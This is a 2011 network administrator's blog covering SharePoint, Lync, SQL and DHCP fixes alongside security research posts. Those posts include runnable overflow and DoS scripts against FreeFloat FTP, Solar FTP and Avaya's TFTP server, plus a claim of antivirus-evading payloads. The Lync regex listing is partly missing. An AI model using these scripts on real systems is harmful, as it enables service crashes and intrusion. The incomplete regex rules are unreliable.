Wednesday, December 21, 2011

Signing off!

Since I'm no longer doing network admin work and am doing full-time security work, I'll be migrating my infosec posts to my new blog. This blog, however, will never die. The 3 to 4 people who read it will be happy to know that. Gabe, you don't count.

Hasta Luego!

Monday, October 10, 2011

SharePoint Report Viewer Edit Items Permission

If you use the SharePoint 2010 report viewer web part, you have probably already created a new permission level with limited rights to view the report. However, you may notice that the "Edit Items" permission is required to render your report. This is obviously a problem: if your users have this permission, they can change the layout of the page, which is bad. Specifically, a regular user will see the "Edit Page" option in the Site Actions menu. This is the problem we're going to solve.

To get around this, you need to go to the report library where your report is located. Hit the drop-down menu next to your report and you should see "Publish Major Version." As soon as you do this, you can go back to your "Report Viewer" permission level (or whatever name you gave it) and remove the Edit Items permission. When you revisit your page, the report will run and the user can no longer edit the web page.

Tuesday, September 13, 2011

CISSP Review, Strategy and Advice

Today I found out that I am one step closer to becoming a CISSP by passing the exam. I realize there are quite a few reviews of this exam out there, so I'll only add what I think is beneficial.

I put off this certification for years because it isn't that technical and I thought it was going to be boring. I also thought it was just about reading a book and taking an exam; I was wrong. The first mistake I made with this certification was underestimating the amount of information there is to know. Even if you have worked in the common bodies of knowledge, you still have to go through the CISSP's version and terminology or you won't be ready for the exam.

The biggest piece of advice I can give for the exam is to focus on CONCEPTS. You really need to understand why things are the way they are in the CBK. I went through about 4,000 practice questions, but only about 5% of them were like the questions on the exam. I also used all the Shon Harris exam questions that came with the 4th edition of her book; again, the questions on the exam were different. These are still great tools to practice what you know. Instead of just memorizing answers, make sure you know WHY the answer is correct. I promise you, this is the best advice I can give.

Use multiple sources of information to study. I read this somewhere else but didn't really start utilizing the strategy until about halfway through my studying. It helps because your brain processes the concepts in two different voices, which actually helped me remember things during the exam.

My Study Strategy and Lessons Learned

Here are the resources I used to study: the official guide, the Shon Harris book, and the Eric Conrad Study Guide.
First bit of advice on strategy: make sure you have one. Don't just start reading and studying haphazardly. Have a plan and try to stick to it; the organization will pay off. If I had to do it over, here is what I would do: read the official guide first. It's kind of a rough read, but anything that doesn't make sense or isn't clear you can reinforce with the Shon Harris book. Then, as you begin taking practice tests, review what you know with the Eric Conrad Study Guide. This strategy worked for me, and I wish I had written it down before I began studying. I didn't really have a solid study process, and as my exam date got closer I started to panic.

I hated this entire process and the exam was hard, but the worst part was probably waiting for the results. I got mine about 4 weeks after I took the exam. This was torture! I do think there is value in the content, and I did learn a lot, more than I expected ;)

I hope this helps!

Wednesday, August 31, 2011

SharePoint 2010 Authentication Prompts in Document Library

SharePoint 2010 is an incredible product; however, it is a beast. There are so many moving parts and nothing is really "simple." One thing I recently ran across was a flood of authentication prompts and security warnings when users would open a document in a document library or save to one. This totally ruins the user experience. They're already leery of the application, and if you make them authenticate all the time, they'll hate you. In addition, you don't want them to use the "Remember Password" box, because when their password changes, they'll be screwed.

I had a hard time finding a concise solution to solve this problem, so here is what I used and had the best success with:
  1. Add your site to the Trusted Sites Internet Zone.
  2. Go to Internet Options - Security - highlight Trusted Sites - click Custom Level - scroll to the bottom and, in the User Authentication section, select "Automatic logon with current username and password."
  3. This can be done via group policy by going to:  User Configuration - Policies - Administrative Templates - Windows Components - Internet Explorer - Internet Control Panel - Security Page - Trusted Sites Zone. From here find "Logon Options" and enable it. Pick the "Automatic logon with current username and password option."
This will get rid of most of the prompts; however, there is one more change you need to make if you're getting prompts when users save a new document up to a document library:
  1. The changes are in reference to this KB
  2. You need to adjust the AuthForwardServerList to include your URL. You can use a * if you want. Make sure you use the full URL like https://*
  3. This can also be done via group policy by following this post:
  4. One thing the author of that post does not tell you: you have to modify this GPO registry item so that its action is set to CREATE, since it is a NEW registry key.
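For reference, AuthForwardServerList is a multi-string value under the WebClient service parameters; it ends up looking something like this (the URL shown is a placeholder — use your own SharePoint host):

```
Key:   HKLM\SYSTEM\CurrentControlSet\Services\WebClient\Parameters
Value: AuthForwardServerList  (REG_MULTI_SZ)
Data:  https://*.example.com      <- placeholder; use your full URL
```

Restarting the WebClient service (or rebooting) should pick up the change.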

Monday, August 29, 2011

SQL Server Maintenance Plan Execution Failed

No matter what type of SQL Server Maintenance Plan you create and no matter what credentials you use, the plan always fails with "Execution Failed." There is almost no information to go on either. Event logs, SQL Agent logs....nothing is reporting a problem.

Are you using SQL aliases?

Make sure you've set the alias for both the 32-bit and 64-bit drivers. We ran into this exact problem, and as soon as we added the alias for the second driver, all the maintenance plans ran fine.
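If you'd rather check the aliases directly than click through the configuration tools, the two driver stacks keep them under separate registry keys on 64-bit Windows, which is why a plan can fail when only one is defined:

```
64-bit clients: HKLM\SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo
32-bit clients: HKLM\SOFTWARE\Wow6432Node\Microsoft\MSSQLServer\Client\ConnectTo
```

The maintenance plan subsystem and the management tools don't always run at the same bitness, so define the alias in both places.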

Wednesday, July 20, 2011

FreeFloat FTP Buffer Overflow

The other day a new exploit for FreeFloat FTP 1.0 was published. I took a quick look and decided to see if there were other commands that were vulnerable. I started fuzzing and noticed quite a few commands overflowing EIP with 41414141: ABOR, ACCT, ALLO, etc. I basically stopped looking because every single command I tried would crash the application.

It seems any unimplemented command caused the same buffer overflow. I posted my exploit on PacketStorm. I also noticed that basically any four letters you send as a pretend command will overflow the buffer. PWND even worked!
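If you want to reproduce the fuzzing part yourself, a minimal harness along these lines is all it takes. This is a sketch, not the published exploit — the target IP and the 1000-byte length are placeholders:

```python
import socket

def build_probe(command, size=1000):
    # Any FTP command followed by an oversized argument. With FreeFloat 1.0,
    # the command itself barely matters -- unimplemented ones crash it too.
    return command.encode() + b" " + b"A" * size + b"\r\n"

def send_probe(host, command, port=21, size=1000):
    # Connect, swallow the 220 banner, fire the probe, and move on.
    s = socket.create_connection((host, port), timeout=5)
    s.recv(1024)  # banner
    s.sendall(build_probe(command, size))
    s.close()

# Against your own lab VM only, e.g.:
#   for cmd in ["ABOR", "ACCT", "ALLO", "PWND"]:
#       send_probe("192.168.1.50", cmd)
```

If EIP reads 41414141 in your debugger after a probe, you've hit the same overflow.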

If you're interested in buffer overflows or fuzzing, I highly recommend grabbing a copy of this POS software. Whoever coded this did absolutely no checking of user input at all. It really should be used as a learning tool. Everything I found was a straightforward overflow. Good fun!

Friday, July 15, 2011

Lync Contact Card Regular Expressions

The contact cards in Lync are a nice feature but are a cause of confusion for some. You may notice that the phone number fields for some of your AD users do not populate, or are not populated the same way you entered them in Active Directory. The reason is that the Lync server uses a generic set of regular expressions to format them into E.164 format. Why does it do this? A lot of people integrate their phone systems with their Lync server so that you can dial people directly from your computer by clicking on their phone number. Phone systems need these numbers in a specific format so they can handle them accordingly.

A client of mine had a situation where multiple hands had been in Active Directory over the years, and therefore employees' phone numbers were entered in multiple formats. For example:

(111) 222 - 3333
111-222-3333 x44
111-222-3333 x4444
111-222-3333 ex 44

This client did not have an integrated phone system but wanted to utilize the contact card functionality for reference without having to go through their entire AD and re-enter them all. Seems reasonable and easy enough eh? Meh.

Lync Server looks in the share you set up during installation for address book files. This is typically \\server\share\1-webservices-1\abfiles, in the Company_Phone_Number_Normalization_rules.txt file. This is the file where the regular expressions need to go.

I contacted Microsoft Support (greatest enterprise support known to man) for some help with coming up with a series of regular expressions to help accommodate all of the different variations we could think of. Here is what they came up with and they work perfectly:

## Normalize 10-digit phone number patterns from Active Directory into +E.164
##(?:\+?1[-. ]?)?\(?([0-9]{3})\)?[-. ]?([0-9]{3})[-. ]?([0-9]{4})?\D*(\d*)
##+1($1) $2-$3 $4

#For normal phone numbers with 10 digits

#Various configurations of the 10 digits
#For 10 digit numbers using X as the extension notation (2 digit extensions)

#For 10 digit numbers using X as the extension notation (4 digit extensions)

#For 10 digit numbers using Ex as the extension notation (4 digit extensions)
+1$1$2$3 Ex $4

#For 10 digit numbers using ex as the extension notation (4 digit extensions and case sensitive)
+1$1$2$3 Ex $4
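Before dropping rules like these into the normalization file, it's handy to prototype the matching in a scripting language. This Python sketch is NOT the Microsoft-supplied expressions, just a compact equivalent of the same idea: pull out the ten digits and an optional x/ex extension, whatever separators were used:

```python
import re

# Illustrative pattern only -- area code + 7 digits with arbitrary
# separators, then an optional "x44" / "ex 4444" style extension.
PATTERN = re.compile(
    r"\(?(\d{3})\)?[-. ]*(\d{3})[-. ]*(\d{4})"   # the 10 digits
    r"(?:\s*(?:x|ex)\s*(\d{1,4}))?",             # optional extension
    re.IGNORECASE,
)

def normalize(raw):
    """Return a +E.164 string (with ' Ex NN' if an extension was found)."""
    m = PATTERN.search(raw)
    if not m:
        return None
    area, prefix, line, ext = m.groups()
    e164 = f"+1{area}{prefix}{line}"
    return f"{e164} Ex {ext}" if ext else e164

for n in ["(111) 222 - 3333", "111-222-3333 x44",
          "111-222-3333 x4444", "111-222-3333 ex 44"]:
    print(normalize(n))
```

Once the prototype handles every variation you can find in AD, translate it into the rule-file syntax.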


Keep in mind, you'll have to regenerate your Address Book files manually or wait about 24 hours for the new database files to be updated. You also might need to delete your local galcontacts.db files that are located in C:\Users\user\AppData\Local\Microsoft\Communicator\

Hopefully this helps you if you're in the same situation!

Wednesday, July 13, 2011

Solar FTP 2.1.1 PASV Exploit

Let the fuzzing continue.... I found a remote bug in Solar FTP's handling of the PASV command. Appending a string of about 2127 bytes to the PASV command causes the application to crash, and under certain circumstances remote code execution is possible as well. I worked again with my comrade, Gerardo Galvan, and we had it published yesterday.

The interesting part about this exploit was the JMP EAX we used took us to some junk before our actual buffer. Fortunately, executing the instructions we landed on did not cause the execution flow to change directions.
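For anyone studying the exploit, the buffer follows the classic saved-return-address overwrite layout. The sketch below uses placeholder values — the offset, the JMP EAX address, and the shellcode are hypothetical, not the ones from the published exploit:

```python
import struct

def build_pasv_payload(offset=2000, jmp_eax=0xDEADBEEF,
                       shellcode=b"\xcc" * 16, total=2127):
    # Filler up to the saved return address (placeholder offset).
    buf = b"A" * offset
    # Overwrite EIP with the address of a JMP EAX gadget (placeholder).
    buf += struct.pack("<I", jmp_eax)
    # Code we hope execution reaches after the jump.
    buf += shellcode
    # Pad out to the ~2127-byte length that triggers the crash.
    buf = buf.ljust(total, b"C")
    return b"PASV " + buf + b"\r\n"
```

The twist described above is that EAX pointed slightly before the buffer, so a few junk bytes got executed first — they just happened not to derail the execution flow.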

We left some work for a future researcher: figuring out why the behavior changes when the IP address changes. We had a similar problem with Golden FTP, but the Solar case was much more confusing; I couldn't get consistent behavior by changing IP addresses. Hopefully someone can figure this out in the future!

Saturday, June 18, 2011

Server 2008 VMware and ESET Freezing Problem

***UPDATE*** Literally the day after I posted this, my server locked up again... I will post another update if I get it fixed!
I have been plagued with a very strange issue that I finally found a solution for. I had a Server 2008 R2 VM running Exchange 2007 that would randomly lock up completely. The only way to get the box back was to do a reset from within the VM client. My client was running ESET Mail Security as the antivirus on the box. When I removed the antivirus, the problem went away. This, however, is not the final solution :)

It was extremely difficult to troubleshoot this issue since there were no crash logs at all to debug. I was desperately looking for some kind of a pattern to the crashes but I couldn't find anything consistent. There were no indications in the event log of any problems prior to the crash. I began disabling other agents running on the machine, updating VMware tools, installing the latest service packs etc. but nothing fixed it unless I removed ESET.

I found a post talking about a similar issue (with NO mention of ESET) that recommended increasing the Video Ram on the virtual machine. On this particular box, it was set to 8MB, I increased it to 64MB from the VM client. Since doing this, I have not had this box lock up in the last month. I also reinstalled ESET and everything is working perfectly.

What makes this issue even more bizarre is that I ran this particular server with ESET on it for 4 months prior to deployment, even with a few mailboxes running off of it, and NEVER experienced the problem. I was fighting this issue on another Exchange box running Server 2008 (not R2). I figured I would try a 2008 R2 box since I was literally out of other options. The problem came back after I moved all these users over to the new Exchange server. It appears the issue only occurred for me when the Exchange server was actually servicing a number of mailboxes.

Hopefully this post helps someone else having the same problem.

If you're not sure where to do this, just edit the properties of your VM from within the client and modify the Video Card settings. The VM has to be turned off before you can change this value.

Monday, May 16, 2011

AppAssure Replay Review

A complete overview of Replay and its features can be found on their website:

I have been using this product for about 1.5 years and was drawn to it by the impressive feature set and very competitive price. My opinion of this product has varied greatly in the time I have used it. I have loved it and I have hated it. Prior to this product I used DoubleTake, Acronis, BackupExec and EMC's RepliStor. I have over 10 years of network administration experience and have used countless products in this arena, so I have high standards :)

My requirements for this new backup/dr product were as follows:
  • Offsite Replication
  • Quick and reliable backups
  • The ability to recover entire VMs
  • Mailbox level Exchange and SQL backups
  • Affordable
One of the Replay sales folks got a hold of me at the right time - as I was looking to replace my expensive and cumbersome DR product. They gave a great demo and I was sold.

I started on version 4.3 or 4.4 - I can't remember. Currently, they are on 4.6. I really want to love this product, but the reality is that it has burned me as many times as it has saved my butt. Here is a list of the technical issues I've faced over the last 1.5 years:
  • After installing the Replay agent on one box, it now takes 15 minutes to boot up. This is confirmed by safe mode stalling on one of the Replay drivers.
  • A different box consistently blue screened every time the agent was installed. I worked for hours with support to try and resolve this but never got a resolution. We rebuilt the box and that is how it got fixed.
  • Replication would often get corrupted, which meant having to re-seed the drive. This is very time consuming, considering you have to copy a lot of data to a USB drive and then FedEx it to your DR site.
  • If you want to archive a set of backups by adding a new drive and keeping the old drive... there is no simple way to get back to those archived "recovery points." You have to go through a series of registry hacks to get to them. ARG.
  • There is no replication throttling. This means the product will consume all your bandwidth when it is trying to replicate. All of their competitor products have this feature.
  • On a recent server recovery, I successfully restored a server but when the server booted I was presented with the "black screen of death." Of course this happened at 11PM and I didn’t get a solution until 3AM. Long day. I ended up using a different recovery point which fixed the issue.
  • Replay does not handle big servers very well. I tried to use it with a 400GB Exchange server and encountered numerous issues. When the system does its "online roll-ups," the recovery points are totally unavailable, which means you can't run restores during this process. This would be a major problem if you needed to recover quickly. The product should do all its own maintenance in the background so it doesn't disrupt your environment!
  • The console is very slow and crashes. This has been improved in the latest version but it is still buggy.
  • The "console/core" isn’t very compatible with older Replay agents. Meaning, if you upgrade your console/core, you almost always have to update the agents. Updates usually require a reboot.
I will say that the product has consistently gotten better over time but as soon as I start to get excited about the product, I am usually quickly reminded why this is a love hate relationship. 
This company has potential but they have areas that need major improvement:
  • Their support is just bad but getting better. Level 1 folks have managed to help me about 10% of the time and it is mostly just running through troubleshooting steps I have already performed. I often have to escalate to get real answers. In fact, on one of my issues I went all the way to the CEO before I got a response. Nothing personal to any of these folks, they are all very nice and probably understaffed.
  • Their support is slow to respond. More often than not, I have to follow up with them. Everyone should model their support after Microsoft. The sense of ownership and follow up by MS engineers is tremendous.
  • They have spotty 24 hour support. Good luck trying to get them on their "off hours." As a DR product you would think there would be good 24 hour support.
  • Their account support is horrible. It took me 2 months to get a simple answer to a problem with a renewal I had. I sent 15 emails, called and then finally contacted support to have them walk over and get my account person to answer my question. If the product hadn’t been so cheap, I would have dropped them right then and there.
  • Their online knowledge base is horrible. I usually try it before I open a ticket, but I think I've found exactly one solution there; the rest had to be called in, which = more time.
That is a lot of negative; let me speak to the positives about the product:
  • If you have a smaller Exchange environment, say less than 100GB, the Exchange piece is very nice. You can recover emails quickly and usually pain-free.
  • They have very competitive pricing to get you in the door.
  • You can export your recovery points to a standby virtual machine. This is incredibly cool and useful. The catch is that you're obviously limited by your network throughput; if you're trying to export a 200GB server to a VM, be prepared to wait.
  • The replication seems to work nicely in the newest version. If you have plenty of bandwidth the lack of throttling probably doesn't bother you. 
  • The compression and de-duplication are fantastic. Bravo!
  • Your recovery points can be validated, which means the software simulates a mount of the backup to make sure it's good. This is a fantastic feature. You get a green check mark to indicate the backup is good.
  • In the latest release they seem to have fixed the slow console.
Regardless of my heartache with this product, I think I will continue to use it. They'll get one more year of me! Since the license renewals are based on list price, they can get expensive, but with all the work I've put into this product I need to see if they can continue to improve it. I've never been this patient with a product, but I think Replay has a lot of potential; they're just not there yet. They need much better support, and they need to hire more developers to crank out the bug fixes and features that Replay needs.

****UPDATE**** 11-9-2011
I must say, AppAssure has certainly been attentive to my bitching. They've reached out to me a number of times to resolve and ease my pain. I've personally spoken to their CEO and I am enthused with the future of the product. It sounds like some very cool things are coming out in the 5.0 release. I was also impressed with their dedication to fixing older issues and stability problems. I've noticed more and more stability as we're now running 4.7. They're moving in the right direction...

Tuesday, May 3, 2011

Offensive Security Certified Expert

I will start this post the same way I started my post on the OSCP certification, with a slight modification:

"This was one of the hardest THE HARDEST thing I have ever done in my life both academically and professionally. This course is not for the faint of heart and requires a lot of self discipline, perseverance and a very understanding wife."

The Offensive Security guys recommend taking the "Pentesting with Backtrack" course and successfully completing the OSCP exam challenge before you take the "Cracking the Perimeter" course. After the CTP class, you can take your Offensive Security Certified Expert exam challenge and if you pass, you become an OSCE. The OSCE course and exam challenge are significantly harder than the OSCP.

The OSCE is very different from the OSCP, and I never thought I would even attempt the OSCE after the pain I endured from the OSCP. To take the Cracking the Perimeter course, you have to pass an initial challenge before they will even take your money to sign up.

You have to obtain the 16 byte registration key -- sounds simple enough, eh? This is their attempt to weed out the weak! I attempted this challenge one evening, just to see if I could do it. I managed to get the registration key and submit the registration form but now I had a real predicament on my hands. "Do I let the Offensive Security guys torture me again?" The answer was clearly YES, I need more pain.

So the journey begins.

There are some notable differences between this course and the OSCP course:
  1. The lab for the OSCE is not stocked full of vulnerable systems to compromise. In fact, it's only a handful of boxes that you use to facilitate the course modules. Based on this, I would say you probably do not need the 60 days I signed up for, assuming you can dedicate 30 straight days to the material.
  2. They don't need an elaborate lab for this course because a lot of the material is on exploit development. Meaning, you can hit exploit-db and practice practice practice on your own VMs.
  3. In this course, you will live inside a debugger. You will become so comfortable with HEX and assembly that you will begin dreaming about EB 06. OSCP was about 5% in a debugger, OSCE is about 90%.
65 66 66 20 79 6f 75 20 68 65 78 61 64 65 63 69 6d 61 6c 20 69 20 68 61 74 65 20 79 6f 75!

The material is very interesting and, for the most part, still relevant today. There was one module on antivirus evasion that is a little dated; however, it spawned additional research, and I ended up finding a way to make Metasploit payloads 100% undetectable. That is a Metasploit bind shell :) I slightly expanded work that Scriptjunkie did on this subject. This is an example of how the Offensive Security guys opened my eyes with this course and gave me ideas so I knew what to look for.

The videos and course lab guide are brilliantly put together, just like OSCP. Here is the process I used to learn the material:
  1. I watched all the videos and walked through each exercise in the lab as Muts narrated. Then, I went back and re-did everything on my own.
  2. After I completed the course modules I jumped on exploit-db and started recreating all of the buffer overflow exploits I could find. I would take one, strip out everything in the middle and try to get the same results. I probably recreated 50 exploits. The point of this was to get very familiar inside a debugger and to see first hand some of the obstacles you encounter when writing exploits.
  3. I would revisit the videos and course lab guide as needed.
After my 60 days of lab time it was time to take the exam. I felt like I was ready. After all, I kicked the shit out of the OSCP exam so I was feeling pretty confident about this.

Well, I wasn't ready..... at all. I failed the first exam. I only had 1/3 of the points I needed to pass. The exam is very hard but not impossible. This was the first time I have failed at something in a long time and it was a serious ego check. Not to mention I worked 17 straight hours the first day and another 15 the second day. Part of me wanted to throw the towel in because I had already learned much more than I ever thought possible and I wondered if the cert was really worth it. I thought I had reached my technical limit. That thought didn't last too long. I continued to perfect my skills and took the exam again about 3 weeks later. This time I was ready and passed. What an incredible feeling.

While I was practicing the exploitation techniques they taught me and trying to expand my skills, I managed to find a few software bugs on my own. Most of them are boring DoS, but one was a remote code execution buffer overflow.

I'm not sure I can recommend this course to everyone — it's pretty gnarly — but again, it is brilliantly put together by Offensive Security. They certainly give you the tools to help you succeed, but as usual, they don't tell you everything you need to know. The content in this course is fascinating, and if you're a security junkie you will find it thoroughly entertaining. It's too bad this cert doesn't get more notoriety, because I now have a much better grasp on security than I did after the OSCP. Twice now the Offensive Security folks have expanded what I thought was possible, and it has really helped me in many areas.

There is so much information to know in the infosec industry and this process taught me something important. To excel at the fastest pace possible in infosec I think you need to be on the edge of going crazy. What I mean is that there is too much to know and the only way to continue learning at an accelerated pace is to be on the edge of too much information. This is a fine line and if you can learn to balance it with your home/family life, you're in good shape, otherwise you'll go nuts.

Thanks again to offsec for making me a little more crazy and at the same time opening my eyes up to the significant issues infosec faces. At least I have a little better idea how to secure my networks and what to watch out for.


Thursday, March 24, 2011

Avaya IP Office Manager 8.1 TFTP DoS

I found a boring DoS in the TFTP server that runs on the IP Office Manager for Avaya phone systems. Nothing exciting: no registers were overwritten, and neither was SEH. Here is my exploit:
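For context, TFTP DoS probes of this kind are usually just a read request with an oversized field. The sketch below builds an RFC 1350 read request with a huge filename; the 2000-byte length and the target address are placeholders, not the values from the published exploit:

```python
import socket
import struct

def build_rrq(filename, mode="octet"):
    # TFTP read request per RFC 1350: opcode 1, filename, NUL, mode, NUL.
    return (struct.pack("!H", 1)
            + filename.encode() + b"\x00"
            + mode.encode() + b"\x00")

def dos_probe(host, port=69, size=2000):
    # Fire one oversized read request at the target (UDP, no handshake).
    pkt = build_rrq("A" * size)
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(pkt, (host, port))
    s.close()

# Against your own lab box only, e.g.: dos_probe("192.168.1.60")
```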

Monday, March 7, 2011

"Lync is Experiencing Connection Issues with the Exchange Server"

I was receiving this error on only one person's machine. If I used their account on other machines, I would get the same error in the Lync client. It was denoted by a red X in the bottom right of the client. The problem ended up being some sort of corruption in their Exchange mailbox. I backed up their current mailbox, disabled it, and then created a brand new mailbox. The error went away after doing this. I was able to recreate the issue by disabling the new mailbox and reconnecting them to their old one. It was a bit annoying for the user while I was moving mail around, but oh well! Don't forget to grab their Exchange server-side rules as well before you blow away the old mailbox, or before the system blows it away for you. I'm not sure how the mailbox got corrupted, but this was my fix!

I am running Lync Server 2010 and Exchange 2007.

***UPDATE***July 15, 2011***

Based on one of the comments on this post, I did some additional research. The bad character in a contact that the commenter described turns out to be yet ANOTHER cause of this issue.

I deleted all the users contacts (they were left in the deleted items). Then I closed Outlook and Lync, then reopened Outlook and then Lync..... the error went away!

I moved the contacts back in blocks of 10-15 at a time, trying to isolate the contact and repeating the process of opening and closing the apps. I finally got the error to come back on one of the iterations. I ended up isolating the issue to a single contact, and I noticed that there was a strange character at the end of this contact's phone number. It looked like a square or, in binary terms, a null byte. As soon as I deleted this "square," I was able to move the contact back and the error did not return. Then I moved all the rest of the contacts back in and, fortunately, no other contacts had this issue.

I suspect that an easy solution to this for a person who has a lot of contacts would be to export them all to a CSV file then delete the user's contacts. I don't think the special characters would make it to your export so all you would have to do is import them as new contacts. Maybe someone can test this and let the readers know.

Thanks again to the "anonymous" poster for the additional information to spark this investigation!

Tuesday, March 1, 2011

Server 2003 DHCP VLANS and Cisco Aironet Problem

I was adding a Cisco Aironet 1310 to a location that had multiple VLANS all being serviced by a Cisco Router, HP Procurve Switch and Windows Server 2003 DHCP.

I configured the Aironet with two SSIDs on different VLANs. The employee VLAN was the "native" VLAN in Aironet speak; the guest VLAN was the secondary VLAN.

First Problem:  
When connecting to the guest VLAN, we were getting IP addresses from the first VLAN. It seemed the DHCP server was not able to distinguish between requests from the different VLANs.

Because DHCP is broadcast-based, the router naturally segments our broadcast domains, as it should, so the broadcasts don't reach the other networks. This is typically worked around by adding "ip helper-address x.x.x.x" on sub-interfaces that are not on the same network as the DHCP server, which essentially turns the router into a DHCP relay agent. I have implemented this a hundred times and was stumped as to why it wasn't working.

Looking at the packet captures, I noticed that the initial DHCPDISCOVER packet from the client was showing up in pairs, and the two copies were slightly different. One packet had the source address of the router's sub-interface and the destination of the DHCP server; the other was a true broadcast packet to the whole subnet. The problem was that the server was responding to the regular broadcast packet, and thus handing out an IP from the employee VLAN every single time, regardless of the VLAN the client was on.

First Solution:
The culprit was a monitor port set up on the HP ProCurve switch: it was mirroring all the traffic on the router's port to the port the DHCP server was plugged into. That's why I was seeing both packets in the capture. As soon as I turned this off, I stopped getting the wrong IP on the guest network.... I was getting NO IPs at all.... the plot thickens....

Second Problem:
While troubleshooting the first issue, I set up a DHCP server on the router itself to try to isolate the problem. I ended up removing the DHCP configuration, but by mistake I typed the command "no service dhcp." This was the problem: "service dhcp" also controls the DHCP relay agent functionality on the router. You can read about this command here.

Second Solution:
Typing "service dhcp" immediately fixed the issue. The reason I knew there was a problem with the router was because the DHCPDISCOVER packets were hitting the server but the server was ignoring them. The reason was because the router wasn't changing the source IP to the sub interface of the router so the DHCP server didn't know what IP to give it.

Saturday, February 12, 2011

DroidX vs iPhone

Being the "phone tester" for our company has enabled me to try out a number of different phones over the last three years: Motorola Q, Droid, Blackberry Tour, Blackberry Pearl, Droid Incredible, DroidX and iPhone - all on the Verizon network. I was iffy on every phone until I got my hands on the DroidX. What a great phone! My love for the DroidX made me a bit apprehensive moving over to the iPhone. But how could I comment on phones without trying out the market leader?

I will basically keep this commentary between Android/DroidX and iPhone. Blackberry is a dying breed; they need to change something fast or they'll be left in the dust. There is too much functionality in these other little devices for people to turn down. I realize that corporations have a lot invested in their BES servers, but over time these will go away. I am making a huge assumption that Android and iPhone will embrace the security controls that Blackberry Enterprise Server has over everyone else; that is the only thing Blackberry still has going for it.

There are plenty of articles out there about how great these phones are, I'll just bitch about them:
  • GPS Navigation: The iPhone does not have free turn by turn navigation like Android. This is my favorite feature of Android devices. You can throw away your car GPS if you buy an Android phone because the GPS/Google Maps navigation is that good.
  • Shortcut Menus: The iPhone does not have a "long press" shortcut menu. This is another great Android feature that Apple should incorporate into their phone. It's kind of like the right-click in Windows: it gives you a quick list of common tasks based on whatever you hold your finger on. Another shortcut menu I love on Android devices is the pull-down menu from the top; it's a very quick way to respond to different notifications. The iPhone doesn't have anything like this.
  • Voice Recognition: The voice recognition on the iPhone is inferior to Android's. With Android, you can speak a text message and it is incredibly accurate. This was a feature I ended up using all the time but have to give up with the iPhone.
  • Email Sub Folder Message Notification: Here is the situation: you use Outlook/Exchange and you have server-side rules that shoot emails into specific sub folders based on certain criteria. For example, all emails from "Dan" automatically go to the "Dan" sub folder. The problem comes in when Dan sends you a message.... Android and iPhone do not notify you of the new message. This is the only other feature I like in Blackberry devices. I ended up finding an app for Droid called "Touchdown" that replaced the native email client. It shows all your sub folders in a filtered view so that it appears you just have one big inbox, and when new messages arrive in a sub folder, you are notified. That got around the sub folder issue. The iPhone doesn't have an app that does this (that I have found). What it does is give you a notification that a new message has arrived, and then you have to manually browse to the sub folder to get the message. What a pain in the ass.
  • General Interface: I prefer the iPhone over Android. The interface is very sleek and things seem to be very intuitive. This goes for most Apple products I have owned. Add a long press menu and this category goes to Apple hands down. I found the widgets that Android has kind of clunky and not very aesthetic.
  • Message/Missed Call Indicator Light: The iPhone does not have one! I loved being able to look across the room at my DroidX to see if I received an email or had a missed call by that little green light.... the iPhone requires you to manually unlock the phone and look at the home screen. However, you can jailbreak the iPhone and use an app to gain this functionality.
  • Stability: The DroidX required occasional reboots due to system lock ups. The iPhone has not done this to me yet...
  • Market vs App Store: For the most part, if there is an Apple app, there is an Android app (except of course for my Touchdown app!). From a security perspective, it seems Apple does a little better job vetting the apps that are approved for download. The Android market is like the wild west, anything goes so you may be buying a farting app that is also stealing your email in the background.
I'm really on the fence with these two devices even though it sounds like I'm bashing the iPhone. There is something about the iPhone that is sexy and draws you in. A few months with the iPhone might help but that DroidX was pretty nice!


Back to the DroidX. The Gmail/Gtalk integration is so much better, and I missed too many little things about this phone. I think it's official: I'm an Android dork.

Tuesday, February 1, 2011

Lync Server 2010 Application Sharing Error: "Sharing failed to connect due to network issues"

I hit another small bump in the road with Lync Server 2010. IM was working in the test environment, but I was unable to do any application sharing or screen sharing with folks. I found out from Microsoft that this is a peer-to-peer connection... I had assumed everything was proxied through the server, so I was focusing on the ports on that server.

I had a Group Policy firewall rule that allowed the old R2 Communicator client in/out of the firewall and forgot to update it with the new client's file location. In place of the rule allowing "c:\program files\Microsoft Office Communicator\communicator.exe", I added one to allow "c:\program files\Microsoft Lync\communicator.exe".

After a gpupdate /force on the server and a gpupdate /force on my client machines, it worked.
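For anyone without the GPO in place, the rule in question is just a Windows Firewall program rule; a local equivalent (a sketch, not the actual policy, and the rule name is made up) would look like:

```
netsh advfirewall firewall add rule name="Lync 2010 Client" dir=in action=allow program="c:\program files\Microsoft Lync\communicator.exe"
```

The same command with dir=out covers the outbound side.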

Monday, January 24, 2011

The Lync Server Front-End service terminated with service-specific error %%-2146762487

I installed a fresh copy of Lync Server 2010 Standard and got all the way through the install without a problem... but none of the services would start. I was getting this error:

The Lync Server Front-End service terminated with service-specific error %%-2146762487.
Warning: Cannot start service RTCPDPCORE on computer **************.
In my case, the problem was that I was using an internal certificate authority. My certificate was fine and was correctly applied to the server, but I forgot to import my internal CA chain into the server as a trusted root certification authority. As soon as I did this, the services started right up.
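If it helps anyone, the chain can be imported from an elevated command prompt with certutil (the .cer filenames here are placeholders for your exported root and intermediate certificates):

```
certutil -addstore Root internal-root-ca.cer
certutil -addstore CA internal-issuing-ca.cer
```

You can do the same thing through the Certificates MMC snap-in against the local computer store.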

Sunday, January 23, 2011

Golden FTP 4.70 PASS Remote Exploit

I've been fuzzing a LOT of FTP servers lately. I found a PASS buffer overflow in the Golden FTP 4.70 server and recently had it published on exploit-db.

At first I thought this was just a DoS, but then a colleague of mine, Gerardo Iglesias Galvan, took a closer look and saw that EIP was being overwritten, as well as ESI and ECX. We noticed strange behavior when different buffer lengths were used. By sending NOPs + shellcode + extra padding NOPs + EIP, we could control execution flow. We're using a JMP ESI for the EIP address.

Here is where it got confusing: our exploit was unreliable. My colleague was testing the one I developed in his test environment and it wasn't working. I tested his exploit and it would not work on my network. We also had the Offsec guys try, but they couldn't reproduce it either. If I were a reverse engineer, I probably could have figured out why this was happening, but I am not :) I noticed that if the subnet the FTP server was running on changed, the exploit would fail. It seems the offsets were changing with different subnets. I went through and manually figured out the offset for 4 different subnets; they were all just slightly different. I'm still not sure why the app does this; maybe someone can let me know?

Also, for this exploit to work, the option "show new connections" HAS to be set in the application. You can find it under the Options button in Golden FTP. It should also be noted that failed exploit attempts usually DoS the service. I didn't test whether this works with the paid version; all my testing was done on the free version.


